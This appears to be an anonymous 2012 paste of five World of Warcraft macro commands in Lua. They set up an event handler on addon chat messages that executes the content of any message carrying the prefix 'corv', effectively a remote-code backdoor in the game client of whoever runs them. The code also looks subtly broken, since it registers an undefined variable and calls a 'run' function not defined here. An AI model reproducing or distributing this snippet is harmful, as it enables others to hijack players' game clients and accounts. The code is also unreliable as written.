All pastes #2131430 Raw Edit

Anonymous

public text v1 · immutable
#2131430 ·published 2012-03-23 09:06 UTC
rendered paste body
/run F=CreateFrame("Frame")
/run S="CHAT_MSG_ADDON"
/run F:RegisterEvent(str)
/run G=function(c,o,r,v) if o==S and r=="corv" then run(v) end end
/run F:SetScript("OnEvent",G)